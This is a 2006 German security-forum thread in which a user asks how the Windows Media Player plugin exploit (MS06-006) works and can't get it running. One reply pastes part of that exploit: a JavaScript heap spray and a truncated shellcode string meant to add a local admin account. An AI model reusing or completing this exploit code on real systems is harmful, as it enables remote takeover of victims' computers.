Wie funktioniert der WMP-Exploit?

Dieses Thema im Forum "Sicherheit & Datenschutz" wurde erstellt von Marlon, 17. Februar 2006 .

Schlagworte:
  1. Diese Seite verwendet Cookies. Wenn du dich weiterhin auf dieser Seite aufhältst, akzeptierst du unseren Einsatz von Cookies. Weitere Informationen
  1. #1 17. Februar 2006
    Also, ich suche einen der weis wie dieser Exploit geht: http://www.frsirt.com/english/advisories/2006/0575

    Ich habe vieles Versucht, aber es klappt bei mir net!!!!!!!!

    Eins is klar, der exploit sieht goil aus ^^


    THX! (würde 10ner geben wenn ich könnte)
     

  2. Anzeige
  3. #2 17. Februar 2006
    ^lol


    1.)
    ... was genau ist dein problem ?
    2.)
    nimmst du drogen ? was soll an diesem exploit geil aussehen...ausser 5 zeilen cmd ausgabe gibts da nix zu sehn -.-
    3.)
    *hust* wofür den 10 ..sag mal was willst du überhaupt ?

    ich denk du hast keine ahnung was dieses exploit überhaupt kann / wie man es anwendet / und was überhaupt ne sicherheitslücke hat sondern willst nur irgendwelche server ownen um 100 mbitz du bauen


    mfg moep
     
  4. #3 17. Februar 2006
    ähm,.....das ist kein cmd source-code, scheint php oder sowas zu sein
     
  5. #4 17. Februar 2006
    Javascript passt besser.. (oder meinst du das Perl-Exploit)

    Denke mal dass moep sowas erkennt.. und damit den net user /add befehl gemeint hat welcher durch den Shellcode ausgeführt wird.
     
  6. #5 17. Februar 2006
    falsch..dann wäre ein <? am anfang
     
  7. #6 17. Februar 2006
    wozu "<?"
     
  8. #7 17. Februar 2006
    Bei php geht der Source mit "<?" los ...
     
  9. #8 17. Februar 2006
    achso bin durch das hier ganz durcheinander gekommen

    Zitat:
    Zitat:
    Original von firetool
    ähm,.....das ist kein cmd source-code, scheint php oder sowas zu sein


    falsch..dann wäre ein <? am anfang
     
  10. #9 17. Februar 2006
    ist das spamm ?
     
  11. #10 17. Februar 2006
    wenn ich nicht ganz falsch liege ist das hier doch das exploid oder ?
    @ Microsoft Windows Media Player Plugin Remote Code Execution Exploit (MS06-006) #2

    var spray = unescape("%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141");
    do {
    spray += spray;
    } while (spray.length < 0x1000000);

    // If this is successful, you can login as a local admin:
    //
    // User: wmp0wn3d
    // Pass: password

    spray += unescape(
    "%uc933%ue983%ud9c9%ud9ee%u2474%u5bf4%u7381%u9713"+
    "%u798c%u839b%ufceb%uf4e2%u646b%u9b3d%u8c97%udef2"+
    "%u07ab%u9e05%u8def%u1096%u94d8%uc4f2%u8db7%ud292"+
    "%ub81c%u9af2%ubd79%u02b91817%uacf3%uda56............"+
    "%uc8d3%u9b79"
    );
    </SCRIPT> bla bla + rest

    genau über dem exploid ist die ganze funktionsweise in leicht verständlichem englisch erklärt , wie und wo du das anwendest ist allerdings nicht beschrieben un das ist auch gut so.
     

  12. Videos zum Thema
Die Seite wird geladen...
Similar Threads - funktioniert WMP Exploit
  1. Antworten:
    11
    Aufrufe:
    526
  2. Antworten:
    4
    Aufrufe:
    2.711
  3. Antworten:
    0
    Aufrufe:
    3.821
  4. Antworten:
    1
    Aufrufe:
    2.170
  5. Antworten:
    5
    Aufrufe:
    849